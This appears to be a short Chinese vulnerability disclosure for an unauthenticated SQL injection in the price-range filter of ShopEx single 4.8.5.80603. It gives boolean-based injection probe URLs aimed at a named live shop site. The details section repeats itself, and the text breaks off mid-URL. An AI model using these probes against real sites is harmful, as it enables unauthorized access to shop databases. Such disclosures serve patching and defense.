漏洞提供者:蘑菇街
对漏洞提供者表示感谢。
涉及版本:shopex-single-4.8.5.80603是否需要登录:无需登录
是否默认配置:是有无利用代码:code
漏洞细节:
产品筛选页面 价格区间某处没有intval导致注入.
http://www.dynest.com/readme.txt 9月2号的补丁
http://www.dynest.com/gallery--p,0,50%20and%200-0---1.html
没有产品
漏洞细节:
产品筛选页面 价格区间某处没有intval导致注入.
http://www.dynest.com/readme.txt 9月2号的补丁
http://www.dynest.com/gallery--p,0,50%20and%200-0---1.html
没有产品
http://www.dynest.com/gallery--p,0,50%20and%201-0---1.html
返回正常
返回正常
http://localhost/gallery--p,0[......]